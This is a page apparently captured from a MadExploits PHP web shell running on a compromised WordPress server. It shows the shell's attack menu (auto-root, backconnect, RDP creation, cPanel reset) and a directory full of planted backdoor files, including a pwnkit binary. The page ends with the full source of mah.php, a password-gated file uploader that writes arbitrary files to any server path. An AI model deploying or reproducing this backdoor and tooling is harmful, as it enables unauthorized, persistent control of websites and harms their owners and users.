Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
promoacicfi.com.br /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
1c116a
[ DIR ]
drwxr-xr-x
542633
[ DIR ]
drwxr-xr-x
bbc41
[ DIR ]
dr-xr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
0x194945BXRH.php
4.12
KB
-rw-r--r--
0x19495GZCOU.php
4.12
KB
-rw-r--r--
0x1949BIJKKG.php
4.12
KB
-rw-r--r--
0x1949LKGFCR.php
4.12
KB
-rw-r--r--
0x1949PH5W2F.php
4.12
KB
-rw-r--r--
0x1949Q4FPN1.php
4.12
KB
-rw-r--r--
0x1949RNWM66.php
4.12
KB
-rw-r--r--
468b22
65
B
-r-xr-xr-x
Private-MASS-ova.php
19.06
KB
-rw-r--r--
admin.php
278
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
buy.php
579
B
-rw-r--r--
click.php
2.03
KB
-r--r--r--
documentroot.php
280
B
-rw-r--r--
goods.php
577
B
-rw-r--r--
index.php
7.17
KB
-r--r--r--
index.php0
7.17
KB
-rwxr-xr-x
mah.php
1.29
KB
-r--r--r--
modric8BTCHM.php
70.77
KB
-rw-r--r--
modricDHXFVX.php
2.14
KB
-rw-r--r--
modricPNBH8L.php
70.77
KB
-rw-r--r--
modricZW9ITU.php
2.14
KB
-rw-r--r--
networks.php
1.78
KB
-r--r--r--
options.php
1.09
KB
-r--r--r--
plugins.php
2.03
KB
-r--r--r--
postnews.php
5.72
KB
-r--r--r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
391
B
-r--r--r--
s.php
45.46
KB
-rw-r--r--
search.php
1.45
KB
-r--r--r--
wp-esp.php
577
B
-rw-r--r--
wp-est.php
575
B
-rw-r--r--
wp-log1n.php
1.36
KB
-r--r--r--
wp-ompira.php
577
B
-rw-r--r--
x7.php
278
B
-rw-r--r--
xmlrpc.php.0
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mah.php
<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == 'a1fecbae6a303e0618f95586ddb49de7c30f911fecd8701500320daf754868a0') { $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } } ?> <?php echo('kill_the_net'); $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>"; } }echo '<html><head><title>Upload files...</title></head><body><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form></body></html>'; ?>
Close